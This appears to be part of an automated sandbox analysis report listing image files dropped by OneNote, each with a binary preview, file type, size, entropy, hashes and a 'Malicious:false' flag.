                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22203
                                                                                                        Entropy (8bit):6.977175130747846
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                        MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                        SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                        SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                        SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):52945
                                                                                                        Entropy (8bit):7.6490972666456765
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                        MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                        SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                        SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                        SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25622
                                                                                                        Entropy (8bit):7.058784902089801
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                        MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                        SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                        SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                        SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15740
                                                                                                        Entropy (8bit):6.0674556182683945
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                        MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                        SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                        SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                        SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):55804
                                                                                                        Entropy (8bit):7.433623355028275
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                        MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                        SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                        SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                        SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):41893
                                                                                                        Entropy (8bit):7.52654558351485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                        MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                        SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                        SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                        SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14177
                                                                                                        Entropy (8bit):5.705782002886174
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                        MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                        SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                        SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                        SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12654
                                                                                                        Entropy (8bit):7.745439197485533
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                        MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                        SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                        SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                        SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2695
                                                                                                        Entropy (8bit):7.434963358385164
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                        MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                        SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                        SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                        SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11040
                                                                                                        Entropy (8bit):7.929583162638891
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                        MD5:02775A1E41CF53AC771D820003903913
                                                                                                        SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                        SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                        SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2268
                                                                                                        Entropy (8bit):7.384274251000273
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
                                                                                                        MD5:09A7AE94AA8E517298A9618A13D6E0E2
                                                                                                        SHA1:FA5181A7414BA32F816BF0C4278EC20C615E8B1A
                                                                                                        SHA-256:3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
                                                                                                        SHA-512:074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)*..TT...."....T.Tc.**j..............j.z!*.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}*.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._..*_C.k..p9.p..O..vu...'........0v
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):784
                                                                                                        Entropy (8bit):6.962539208465222
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
                                                                                                        MD5:14105A831FE32590E52C2E2E41879624
                                                                                                        SHA1:078FA63FC7DB5830E9059DF02D56882240429D90
                                                                                                        SHA-256:D0A3A1C3CD63C4023FE5716CBE2C211307D0E277E444D9EF76C7FC097A845FD4
                                                                                                        SHA-512:8FC0ED24E8EC14C46EA523D9265DE28F85C5FC57AA54AD5B9CA162E95F79221E2AD3DD67D1293CF756B67F3D3DECAE122254134EA8D4D00DDED02114B5383947
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......a.L..".......................................-........................!A."1.Qbq....2Ba.........................................................1............?.....3.Ty\......vs....>.>..a.W..s89.d...Z}......rz...`...Z.r.do....u.W.%....gf.>.L..xz....B8=w...g.~g."HD...$..IKJ......nn..*ly..I....L...\q...Q;6.KrxZ.,...j$..ZQ..)f...q`.*..C1..cZ2]-..\.~..J.....^..(.f..9m?..C.NI.UL..X.fy.Z.........+n....r."Z...d..R./\.#...kd.D.5.!...h.3*s-+.......Xjt..}i..rK..y.../>u..]N.....Y..J......1.x./.....F6.......I...._3...k.sM.+..v;.%|.f.~.......:y....S....UKovh...W'........lF... .................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 95x498, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3009
                                                                                                        Entropy (8bit):7.493528353751471
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:aRCTf+0hagMrbAZMJShPdvF/5OzlQFlDF7npkDdWvVBTEnBLT6NrgCX0:D+0YgMrApL553JtEdEVcL2NcX
                                                                                                        MD5:D9BD80D40B458EDB2A318F639561579A
                                                                                                        SHA1:83BA01519F3C7C1525C2EA4C2D9B40F28B2F2E5E
                                                                                                        SHA-256:509A6945FACFB3DDC7BE6EE8B82797AD0C72DB5755486EE878125A959CC09B59
                                                                                                        SHA-512:C368499667028180A922DD015980C29865AEF4A890C83E87AE29F6A27DC323DD729E6FB1C34A2168A148E6A7A972F65A5FC8ACE6981AF1D4E7057D99681CB366
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666........_.........................................:.......................r.!12BQ...3Aaq.."CRb.....#4$c.S.....................................................1A............?..p..-.....u0$.......l......)..o.FTd..DG....... .t*e..jO..Z.U......r..j.O.,..VD./.....V5D.&......A..Zi....E.N....*..........#..M<|.2.Y.../QO.x.cTM4......+.F;V.x.de*....]e..O.x.c\Y........r..j.O.,..T...hw..k.^.[B..J.sEl.w.x.m.5%zzt0..T.......b..<\.3Q..W</..!.xh6..Z..\.+M.o.Y..1............#.........|.a.l.KR>..U......e....@...\.1Z...Y...[....F.6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....Uh....FkYm.m`P...W .V.g..FjVj.\..1Q6.t.#..Z,.x.Q..[`.X......#........W</..TM..-H...V....Tf..........r..j.x.df.f.....#..l.KR>..U......e....@...\.1Z...Y..Y.us....D.)....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2266
                                                                                                        Entropy (8bit):5.563021222358941
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                        MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                        SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                        SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                        SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 813 x 99, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):99293
                                                                                                        Entropy (8bit):7.9690121496708555
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:Moq1jVORV5NO5xLCBaaNk4vhpCr1CH/DATOQlWvHMHojiaAMrxArLFRZPj19AWFz:eVEbouBaIk4T8uDGOQlVHvaAMkhDh95V
                                                                                                        MD5:EA45266A770EEA27A24A5BB3BE688B14
                                                                                                        SHA1:9F0B23B3C8EBA4FC3C521E875EF876FBE018F3C8
                                                                                                        SHA-256:EDAD0F03E6FF99FEF9EF8E8B834CE74F26CD23C5F8C067F5CEE66F304181E64D
                                                                                                        SHA-512:D4EE36BDA897BBD643A699A0332DD00DE9CDCC6F46D861789BAD259A4BF87868AE3B4CFAAB6DFAF29941C7055B77A95D76BAA86A4A0DB2BF3BAF7E3317F03EB9
                                                                                                        Malicious:false
